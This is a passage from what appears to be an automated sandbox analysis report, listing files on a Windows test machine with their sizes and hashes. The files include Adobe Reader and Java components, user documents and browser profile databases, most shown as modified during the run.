SHA1: c1078b035a4d93ed5c76f41be9593f3af9ba8d73 SHA256: 1051eb6783ce03576b1a9bf9987eaa59e8a338ce948cf72d91b2deb605bbef0f SSDeep: 96:uBzowgcV03FJyJFvybNl3TKu85m0qp/cWle0/+eSLMAw3pMoFfdUs:uGwgcV03byJ1Av3Cm0qp/5lOMA+RdL |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite | 1.00 MB |
MD5:
124220a5f9f53ed94bc0c2f3b6515da7
SHA1: c44c819a68cf015df78d4e7f88aa8bda53ba8c7f SHA256: 928361a1cb11a03429b51942687bf00e90f33f5794807c4ae99201eb867b73ad SSDeep: 12288:mbQoSZAKT/kNRt3QtG2xKN5c03bacxQmiXFZNMf8j:JoxS/c2x1GiX28 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | 238.39 KB |
MD5:
45c9c72c9e1c3fee01a1a040d5cc599b
SHA1: 8566c7df64b23833c58ce8c3b276290e1c71cde7 SHA256: de55564a7c57f4b33ad7077b1b30db393490a417a24897dc6111c73c40aea9cc SSDeep: 6144:cq0tNyyoB46Ak+naqaucYEDpEX3gZYreD:cq0tNyF4xk+na0cbGwZPD |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | 1.93 MB |
MD5:
14a531d038049a028e447d2f364679f4
SHA1: 5079e9659ac7c9d70fb172eec5ca1a5eeb3bc24a SHA256: 522b806a9731ad2cc55891b366b405b4b89343c8466d4facc9a629fce77388b6 SSDeep: 49152:vVvC05r0RzGM+74dGDL2bVy8v3yVkcmRHNsKtJzY:NvC05r00z7dmbVyaCVyRCKt |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | 20.72 KB |
MD5:
f2b9310408597d2fe2b3bd95cadfd8e1
SHA1: 01f09b811a706d86629cc4431b148e8c3339da9c SHA256: 8b2636556031ae686c574e78887904e6b118caed162813a580c9fd1dc5cbafa2 SSDeep: 384:rPKBwcJp3Qlllllllgkw4LKK6HIKpWExEZHTpKmppP3FobuUt5AEraCd:riBwcJlKus+EZzAIpP3iKUs7C |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 10.00 MB |
MD5:
5ab5e4b128259efdba1230bc452aea19
SHA1: 5ecf0bd1d00ea49a79dca98e265eec5f804c4dfc SHA256: 171e67529bf0114d61de5f16927219234fe406b0ab18b9a4c635c7d92c67befc SSDeep: 98304:uqNrvZZApqebmeB+m1oW5lVFwAuHTVk1hi:ZNrvQgMEH5Ghi |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | 4.87 KB |
MD5:
81a13fadd1c3d55ae029327932ed1488
SHA1: 6097bed8864dfebc08feb29beca29dc198991c76 SHA256: dadf8d5aef01a1d14cfe1ca5ee8342cf2dd589852296cb3f52c1cac592527e7a SSDeep: 96:2At2jNnO3C9vP376XSde4l752DeFixVZTvwYnhTUXkX+VLMAw3pMoFfdU:2AtKNnZ9Meey752DeFixzT/hT0+A+Rd |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | 27.78 KB |
MD5:
d627bdbe050b8bdbe4cb0dc7f6d1244c
SHA1: 991cc9bb79c461ca277509711935f036a48f4ab8 SHA256: 63940ac5171f86535ea9a49774b5a2ef5909e4062a2e25d47b7ad81aa1d3c5b1 SSDeep: 384:BBABu20hkP018X6sT6AATeINgKP+nHQ41fgcmmItyOQeM9YfvYBo6ifIgYd:BBA2hr8OTeDnLqFXTfuo6ifvY |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | 17.45 KB |
MD5:
5c41c0eb170d43370b5688571ca5cbe6
SHA1: 8734dd6a8f659a213eb74132e2eece82aabc9eb2 SHA256: 7b1103ad7a0e0f05e0196d70aef194e6af9d1e6838be9ad864390af534673cd8 SSDeep: 384:xSZ1s7EORG6KNPuee98nYPaiR2jwMSsUtHMXQhd:4f9tzeyCIw+Iph |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | 274.98 KB |
MD5:
7db65874422f227252290a3a1d7b548e
SHA1: 54ec449136682e0c51edd4ff7d1a0930c67d4c52 SHA256: dfd6492bb41d35c7e572bf661c141f6adcd1d57aff8371968dd56dfaf8c6f329 SSDeep: 3072:j9v5h0QxDras5Ynoc9YZi1uXJzlt9jnEpeAa8bQkr16/mfGrcux2mjBETpQ6a:l5SaDQoFBl3bue98skp0mfwc8dETTa |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png | 1.67 KB |
MD5:
19dd7b1a562768ba70fd828b942c9a56
SHA1: 28526769d0045b715ae0a931fa230e19019a74d5 SHA256: 7d04d7ef3e5bcd81a91e1183a645c8140601f8e9bdfd2d269d6c3b50d860d0ae SSDeep: 24:c7rZQE/rTi+RNvApOOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYY:c/Z5ySPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png | 5.00 KB |
MD5:
ec1ef4d1c625a2e09fd9dc870b89ab2f
SHA1: f15db6cf7f9ce5b3b051e22ee9d6917ac5e52479 SHA256: 24d7fb4f3ef3203dc195ab0f7347150488e98dd622a98b170af48fd7862dd52d SSDeep: 96:uDxRfGzdXMwxvPvUhelc5MsrYbCS34zFWUmDDpHC/iULMAw3pMoFfdU:ud96iwxfxleJmozFWDpi/iRA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | 17.44 KB |
MD5:
ab6344d522e221d423317872611c22fb
SHA1: 73d6e49358358b14d031dd32fb643ed06f6708bb SHA256: e6fcfd89e933adab206ac5f780ccdb2a296c645af2c5ae7a7b0a1fa5e9fda11f SSDeep: 192:PNGvX+NMfVcoydMIEoLc7suSjZKLKL5i424yJT2yYJWb91++B1yerG0XoSCzg3/U:IvXuMdVOMlsflgYuT9bNfrG0XSzgPKd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | 28.04 KB |
MD5:
505db7e94037120400b571f053a26d9e
SHA1: fe76b9107bd6cfcadfa1f3397b9c96011e5d5da3 SHA256: 708ccf5edb97aa19ac8a767dedb915de0488488c79bbf577f54143ea980d345e SSDeep: 384:sQ3rsFb3frY5gqUB31wGvt9FEEBAr5aQnkXcRdLFH3pF/XtfIKjScPyLO68EOBXy:37sFzk07HinzddpF/FvjR6Zc/aN3Ufg |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\2A IhUpAi4OxfZpS31y.xlsx | 31.10 KB |
MD5:
5f6e77623d0e9b3ca123f88f2371e991
SHA1: 59d28f48424f5350773d013a70d60014656ffca5 SHA256: ae8ecdcdecde96f8da4c86c84ae8f6fa6a78bcb5e85d3d93cc1359a1e317e1dc SSDeep: 768:mQMpDZ2bTzF0pxQXznxL8de7Zm9keRkYiMt79:mpDgqQTxFdm9kZMN9 |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | 66.55 KB |
MD5:
23d69bfd5926b73b1540576bafd8550f
SHA1: c229f433a989d503252900f666dec5a9a274ad61 SHA256: c49c97cc6c014c063848724103c0f7f392919db2bd66da33812440d2b1e954f4 SSDeep: 1536:YLJrQrOrM2nYjHWl3Be2BKOhnV4CIqwImi6g6e:YLJrQgBZVFw0 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | 185.00 KB |
MD5:
e1ab916c3e272121819dece94e0fc96c
SHA1: 8b35bcaff21a69a13c41209202989f33e5fe3ef3 SHA256: bd7c19fcf3be430e1638d87eeac209f7d4ec5e451e0b7513d398a17df38b2f91 SSDeep: 3072:88NbsOOjti4Ltqqv25Hum8sneB378Ivvp2/bFV4eZ6V2f1cPWZX/5jj:88lOQ47v2Fumhnmrhvp2zF2g1CWZB3 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | 1.54 KB |
MD5:
d1d87a6c3f4cca568239dfe0d82fa7c8
SHA1: 6954a56c45cfa747baf91ea46bf18685debe1af9 SHA256: 890da64305b95d93eb02cceb05de6cd70450335a95f899872d684b7ac4db9609 SSDeep: 24:Sf2HUqI0DOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYs8jRQ53Ev:SfN0NPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 2.13 MB |
MD5:
7355dd7ea8123da06f43ef30b26d126e
SHA1: b334ea497ad12da78ff5a9cba6f632491bfcbd96 SHA256: e9f15301f3c0e3dbe47a10a8b9b8ba9b75c31efa9d963378921de9284cde6968 SSDeep: 49152:KNFGpXm8GNHxyyVn2W4z17A6wz8f4O8b8ITDnlVP80iin:CPHF2Wy17GP |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | 1.75 KB |
MD5:
12e975fc49d6b187ddbf2effe931cccd
SHA1: 1c2462b2839983a1fd09064131fef9a0841bba73 SHA256: 3db20e982fb61c00268bba2f9325ba6d0985b695b8fefe7f7af706122f174e28 SSDeep: 48:SYm44OS9dPaPFOUzAw+4pAvoFrbwTOjD9UEk:SYmeSPLMAw3pMoFfdUEk |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif | 1.45 KB |
MD5:
4e5dfd9e395624a69614ec68ed1435dc
SHA1: 00b900207779b59b6a9551b42081e14738028dc8 SHA256: 9d809bdf3bc7bc13daf14013a830c2f11a9019bb9d6d66fa306410e06153a97e SSDeep: 24:q3FpOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYs8jRQ53EFuk2t:cFLPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | 63.82 KB |
MD5:
e9a9ab478b80a0a7df820204cadeb903
SHA1: 7a36324aa8426932e50078a1b26d0cb5b33646cc SHA256: 4d4c0f439102428bb01e20f3c2941ffc9a50b9927c07a8b96fd7741af716d5c7 SSDeep: 768:0pV21bNOhXxhLCLhxkJzhoyJss5cCvsb0q1Y7j/NulAA9BdNMbnvbOrY15i0QN3x:t2XHCLkJzKyqs6CSTmLNvkuiYLQNx |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 282.87 KB |
MD5:
0b45beea6e69885d84dda727fa6b2d7a
SHA1: 51fadd9eb4aa240c1b5a47fefa6a52696dfcadf7 SHA256: bc7b3e2ba3150d226108ce17006d1e32f758874f8a6b1551622b2fb4e8a0aca1 SSDeep: 3072:x2jh1Jk/cS8rGzJ9xgkKTEImHMyIfGEuNEXZcGaxXOcm8FC20CYXslPngvN6s:gvk/V8rex+E9sy8nqGaoSFC20vdB |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | 9.47 KB |
MD5:
314506299f90b811b01418ad2a51050b
SHA1: b9708d1b5429568ed35ca0a836e7b1870c063b62 SHA256: e41b838134c50c447e070eadc7d0ce77a42f8aeeeab14be4974390f94577707a SSDeep: 192:vhgInujJo0k7wn59tOAF8gPM5DuHNdIOg4QoD679hzj5Ztl6A+Rd:5gIn8cwn52AF8gkU7IOg4QoD679hH5Z2 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | 1.44 KB |
MD5:
190bb669e16fe9c150fff2a9914fc02a
SHA1: 193461d38ac42c72ff2bf2efefb861605dc35e67 SHA256: 3ce2cd4be3f2d47add08ca26c96c4d85a28a414e2be72ad3cdf369caa01a6548 SSDeep: 24:bQM/fOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYs8jRQ53EFuk2t:jhPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db | 8.38 KB |
MD5:
b3e535513ef9c4a719edf1d660f0b218
SHA1: f1a3469490f415f28e3a19d8773059a6b372536c SHA256: 383a9af105eab7db0a4000184b81c199eb7fe5a5c83e153ec9ed4a82b8cab357 SSDeep: 192:xN/zl4h8ihN6aRlX5OJ74Z4+u+ZIULZOMh8Vnm145kfaSTA+RdF:xZzl4hnhNFlXMMi+aUtOUAK4eCSxd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | 214.38 KB |
MD5:
953df56e230d21a46c57be9f1270eb49
SHA1: fd37a870c6ff062b549de45a6426930f8ab49312 SHA256: f9612df004a377d33e98ab6616751c9c03273635e02ab3a474c6e5e916ec3c6c SSDeep: 6144:CG6qAnpy1sxfFSKGtgDiEgWO4HElWZkgOYFNd:L6qAE1EGtgDFDHElE |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini | 3.07 KB |
MD5:
cf6c054c14ee39067a76e2846600f16b
SHA1: 2776a406ba5593e32ba9b1e0d3d1d58e95e3163b SHA256: eb4f3ddb05b22c863a60634945b0866430f7e61fd682fa91d5b04746dc1a4708 SSDeep: 96:ntVvQrQ1JrU4/cekWJlk0JJheLMAw3pMoFfdU:nt+rqJrU4/cekolNTA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | 1.80 KB |
MD5:
88502cdeda25b0e5895dfe59384635e8
SHA1: 49675ffcf35a9b1c3db45a6758ccf9952cb28e86 SHA256: 617abfbfd551988afc09099e4227759b325f46a77f672806a9086a0d016d283c SSDeep: 48:M4eSHJ4TPaPFOUzAw+4pAvoFrbwTOjD9U7:MQwLMAw3pMoFfdU |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js | 5.03 KB |
MD5:
2fb68ac472c0c9738b6ddac31393e030
SHA1: d092dce5aa944a3a3783dd33d565085d1182beb6 SHA256: a27355bdedc933226a71196998b9e7ee66b3fed29e739176afe1d65b90901a33 SSDeep: 96:aPeWXOvDdkHgA52faKvKCWi2l7IYXDIs2LutkTrcwuJ1LMAw3pMoFfdU:Y0DYVKSCWJIWI5uKn7uwA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | 4.87 KB |
MD5:
3b60be0a94ba581d3064fc78bd329ed1
SHA1: 2e50ff3370d8d658e42faeb5074530241f8004f2 SHA256: 4ed6a39ce42c5e0d28c41de78f0e9df763b1e0223e92f29005ec9a69b4820777 SSDeep: 96:K9JQy+EVGccArcDRlu+2TuqHgWSsap3bK1jwNOzIpI4ZF1LMAw3pMoFfdU:UJQy+EvcArOQTuqHgWSByIOsplbeA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | 1.78 KB |
MD5:
9be5cc831a71ff750430c468c5f6f1d9
SHA1: e9dec01bbe11457d72b2d8504d62f4f4b2c15250 SHA256: 713d5393309178a460424e2ffd8050bc4a7762897eeed04918174fe6fc4ece8a SSDeep: 48:XM+trhDOGYPaPFOUzAw+4pAvoFrbwTOjD9U:XM+ts/LMAw3pMoFfdU |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\X7RlsIgbCQ w\MkRHHKT7IMT_fLj_.ods | 31.77 KB |
MD5:
00fb01792e822bd98f2885ccad54fe7f
SHA1: b0cd4727c61b221d2266801857fbe8c32f13048d SHA256: 54bf2e85559ceb5d521b28d85d841236d9c2d713fb0bdf1093a5f2a5fdfe5d4c SSDeep: 768:aAbw/rO0zKZps2/o0h4uL07u+YftIf4qEcZ1wB4luFzXykM:aAbd0+I2P07NYmPhGFzvM |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | 16.95 KB |
MD5:
b345075170eabbf9f0c7b5b6a684fd41
SHA1: d8e42ce8233716dbe7fbe0f2c7556846a1efd5fe SHA256: 75f473a389dd32d2bd0bb5041a489fd368d269e0a1817bfac17a586d7801db27 SSDeep: 192:2ve0y5n+ZNjxxVxH9pIKEfosVGee59UOnYe+PjKr9YcGbr9qyTSA+Rd:2mx+ZNTgKNEGeevDnYP2r9IVVod |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\-k6Ks0Rn5K.docx | 9.71 KB |
MD5:
7995545cc4dd5fbd4226499d78fefef6
SHA1: d25ce1a40c172cd713e0a0c243180a59a3f8b926 SHA256: 957dae2d9c92829356c8cae1380c205b46e71be48de3ce18a8624b5e265b3672 SSDeep: 192:icHxK5O0Af2RGRm5wEA+XbmFe6k10LKjhLpl7nZJriCEdA+Rd:il5O0Aaha+gLahLpJL/EHd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif | 1.60 KB |
MD5:
613c8c583b09efd28f1d4920ff2b8ce1
SHA1: 567935ef7d8d79180fcd0f418ab6a1cd9c84e9d9 SHA256: 5c50d71e106c4cd3f2cde9b163697cecacafcfc8355142d0796d0aa295fdbc7b SSDeep: 24:7oOJ6mp+VnZnlttOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYs8q:ZNanlNPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\2V_IO2AUQIPx.doc | 58.05 KB |
MD5:
dffd60e7bfcaf4a0b3e7f8cb8a7228af
SHA1: 83c5e3e9a0f5f2edf1581e1fc71ceb7b0ae3a79f SHA256: 0b2d147445641d22173c976b258a9021ffb1f35053d7fb20eb4fed0450028626 SSDeep: 1536:0sEODlVHK02bjgATN/XvpzfLqkVybaw7:gODlVHKJbUAB/NqkVyP7 |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | 66.71 KB |
MD5:
0f9d296af52b06e5e17a8146db6c5a23
SHA1: c21aae6c994d084d9f2e9e1d35026efd6f54a3e5 SHA256: 7313a59612efb63e66eb5bef3c9a7d8935596c16e79bf447f49b319c2a859fc5 SSDeep: 1536:4pYzx0tHlUfLU2ijcl/jstnJ577CvNtj5RSLGCJzlynUQ/dEk5:42etFUfQHjCgV78BRSLxG/d/5 |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | 30.28 KB |
MD5:
38972226b625c7f885191fe3576adf24
SHA1: 3357393338f65622cc3318816b0afc553083d723 SHA256: 911770ca374841e56b4d7bdfafcd52ba74c51ea750820bf892270f3c60f4d546 SSDeep: 768:3KeBwPzOMKTvQ9RqDg9m1+fUpAM5cSLMu00CPbH:3Kn4Dg9m8fi5XLM+u |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | 64.88 KB |
MD5:
6f60448f7399ed2bd0efbf1c614dee20
SHA1: 21f68ab1220654fc564ff90527968849701b856f SHA256: 629f27556a7fd4ffc50d9b318ed34e391fea0525c8d6b3199995e777c2cc9c20 SSDeep: 1536:B482JI6GMJ7LRlghOHK6NyqT031HBncrTuDEWJfApmrLz:Br2JJJ7Ly6oqo3FBc3QfAIrP |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | 30.29 KB |
MD5:
19e1417e7fe6299e7d4a09dba7491ce1
SHA1: 629f69647e61f043b6e5af158e7a328634fb62e3 SHA256: e95765a58b85b13bc7bfb4b795d3ac9ef11889fb52c3af981ae546f3dda14914 SSDeep: 768:NXSzhh+YapqDoCuVu/+++++++++hjF86eBjJY1I3Nr:ZqhcsMF81VY4r |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | 24.84 KB |
MD5:
d0f78704714ab3b59d3dfd457f555f96
SHA1: 87761d829bf277748d0f151fd9e5f164387034a8 SHA256: 0392d5b8ee7513823ce275891afcec0e4013ef50c2feda12bfda3ebdc4f495fc SSDeep: 384:J2utkYyAYpnSp+7cbJ40O9C1rBlsck5THGi4iLTGjmiFvt+b1C+TDzz8k4Kd:J281YpnSpdO9CRBlXiT4zrFF+smXJ |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | 30.29 KB |
MD5:
2dfc526b4bda95bd1657d84d7d5a0c14
SHA1: 43848374937463a5753cebee8240468932f60fe7 SHA256: dfbe206ad628c714e1a8255275659c942094a05753f7b130206d430af60c1307 SSDeep: 768:WvmOR8pYYapqDoCuVu/+++++++++hjF86eBjJYQ8k294:zORQYsMF81VYb94 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | 311.83 KB |
MD5:
33d3f458c5afa89a6bdea03b8b25a0f2
SHA1: 8838328052faaf58e0a105f8d3d24493e4748170 SHA256: 8833b5b6b9f95d2c9755629f02581540ca00a7fc17c87c93848195ca8ba3ec1d SSDeep: 6144:CSlijNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ovC3:dlGCEo9xzJwljXsrhHQ7cMuX/R |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | 34.52 KB |
MD5:
98fdf5b1e0496ca2645980fd6efaca56
SHA1: e86dc11ae5a618617ce5e7611311ac9acb07ad4f SHA256: 707cdeccf321c47f0b4b439d87f2a8ab02cb5774652ebe417a161b64418131ac SSDeep: 768:71ACvNJOyYIYwQUZN9kqizI04ojBxF+gEsw3qx:asNAyY7/UZNIzhpjBxcs |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | 15.68 KB |
MD5:
ac66b664f22c4e583be00dcb01532b4c
SHA1: de2f747c8e53995aa33f156010544ea66fb0eddd SHA256: 4a5ab8721f3cd654aa5300e64bdc1c631901fc16dbd5dd2f73385e10b42ead08 SSDeep: 384:Sr2Ty6WF98eusbg5C9FXK/Ixemclst57FSZZd:gcoFqeusbgY0/IxemclSsZ |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png | 1.67 KB |
MD5:
500e9f16dd972a8a2825bea8351d4ea9
SHA1: 226a19621d834352e51927c662cc349309f283af SHA256: 0a5e9b3f55aaaba91f65964f8621e60ac614a689f205444354fe3cc26a7b0ffc SSDeep: 48:TbsvLTiAqPaPFOUzAw+4pAvoFrbwTOjD9U:Tb4KLMAw3pMoFfdU |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | 42.55 KB |
MD5:
20a5f5a8a004d078139e10bdc9ec7c59
SHA1: 5b3e439549b6b257623bbc35c4c2fbdb72a14174 SHA256: b17be7e88bd363ffdc4da38e5fe86753b5acfbb29536bc101779febb7f6c23cc SSDeep: 768:qfv6zy9aG7FSEl15/4ZW58eKMpP/p5BZmQEnrn6RDan3fgNfuG2zzo20RnJNpEOM:cj9lFSEX5/4C80Rx5e2RDavgNfuG23og |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | 69.85 KB |
MD5:
c16c7c50507ad49cce068312a05c88bd
SHA1: b03a033e849da550bfbba72d6de7d732d6a832c5 SHA256: 0d5b0aa7fd3d33ad2fd93b4d91442c09d214e5eec8f53f5878e50de99f9a7d43 SSDeep: 1536:zg5QTpjUbcpQcU7HhE8rpwfoCIIIDIII2cQsi9V4+M9vzPU7Ii:/q4ScUT1NCoCIIIDIIIENnAvzPiP |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | 9.88 KB |
MD5:
34049e34a4c0250dcaed4687c5797c93
SHA1: 98bab52212b2f13585f92cca67d2780c9df3e1c6 SHA256: 45f81f990449070e6d9525b3af15d5860ca92f658e7c5c395ffdc2dd8e13f43b SSDeep: 192:kv3Z/zx8sBNCqJR4sl3steIxpz1LhKh42rn1M9Zie2Uzq9A+Rd:23Z/zlH+s3stNvKh7a9rzod |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif | 17.44 KB |
MD5:
5806fb47cb6639a65f695828bc9f0e1d
SHA1: d27ea52f53906f124fc99b81eb62560c0637d902 SHA256: e351a12cca44da3c0f70cc8b48604c7d40a4079f33d73375c0538dc05112a0d1 SSDeep: 192:/HuaiBMfWZN3SNDJPSjZKLKL5i424yJT2yXhSaJQ+qTlSeIn1O9v2LRUJFt3bA+5:2nIPNDMlgYuT1n6TlSeIn1g2mtJd |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | 5.36 KB |
MD5:
730bff2363672f48e85807a699801516
SHA1: 3cd6e0b248d5e4d1d2ed8f4a9a101f585278f846 SHA256: 5506bfc297914303acf6b1e1cbbdf37f5dc74727457239313535bbba9eaa4a8a SSDeep: 96:oXfnNXlzsDfk3j4YTJXhc4/IJskSQDQICQynQ/sL1aBLMAw3pMoFfdU:oXfNXl4zk3jdJXylsk/0DQ/HKA+Rd |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | 2.77 KB |
MD5:
e6f19c1330c26e300733d61999f845ad
SHA1: cca43c10ea3dd19410a75154cd190a19c8cbf503 SHA256: 4a3420b8ac6b5419452b0f2b12eed273fb43b78a7a6978c5cdd0fb95f347e070 SSDeep: 48:C3CeakS31cnLtdPRMA5Be7xdZPaPFOUzAw+4pAvoFrbwTOjD9U:kFakSOnHPRMAoLMAw3pMoFfdU |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\jfr\default.jfc | 21.02 KB |
MD5:
eb7fbe8e2e6d580e5232f0b6d02e7d3d
SHA1: 196d7afb354f07f80357df0293b195e5049c015c SHA256: c43fcc7de0cf26dd38c301a8013f11f3173b2cb3cde4179037af2797ace4943a SSDeep: 192:uOd5/almtW1brtOKMmVGCa66LAsmztuxqCbCdCsCNG2ixzTi5OAdzAMzVdWVqGK4:3dB/WlbMm1aedc2FMhCOeysaI8dO |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | 513.38 KB |
MD5:
4054aaf1453ecd3b3aa1604eca7aef6b
SHA1: f04f7b62fc61edc092c5d228839d5921cdb10f52 SHA256: ae824f1d88da6029033940d761eed523e033e590569b06a068e52c4a738dcc48 SSDeep: 1536:rP24XJHkWuLVj9MXVqisPQAvkf6VBLu24XJHks:rPj9kWaj9MXVHxAvkyPSj9ks |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 45.37 KB |
MD5:
a06d390f8019514729492e95aa70241a
SHA1: 44a0a9dc197e131adf1d1263e690f812f91e4132 SHA256: 0b148dd2567128176d8bc4ccb77c0e9687d885ea2b8a082477373d2b5133bc76 SSDeep: 768:Z0Zug/NkZumDHX8Dr3p4OqEpvDZl0GEbJOaNmyZk3E0zwhWZ6rHWNStcB0F3:yeZjjMvGO7v1l07vHuhwhe6jWE71 |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\zhBJB.doc | 62.09 KB |
MD5:
45daf0d0b76084b988eb216f5e154d44
SHA1: 8d61908fee3dbd993ec3bdcaa490e1cf46f8cd38 SHA256: c98ddc05b734cdc186a8a471e8f347b240a8fd65eccb9479e7b3e8fa3a3152f7 SSDeep: 1536:kHeRt1mwoV8xuk/8S9IfxDU1XSuMPGtu3XyDAQJuNqwtbCfT+4pLKo:DRt1msukWDKXSuMNSDAQJuN3O/pGo |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | 338.21 KB |
MD5:
c193dfd74fb3cf4c971772af8f64fe43
SHA1: ff5c99ead3c5640b4d891973c4c7c35c38b91c22 SHA256: 68f13be4d0b4a6de4f3a1c519c7910124950eb9437d4b219d479aa02fc4842b2 SSDeep: 6144:uPJVOyhUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNV:CJV96vCCTcaFNJw7tSgYS8F |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | 17.45 KB |
MD5:
3651e14baeeabcb56af51aeb0ed3528d
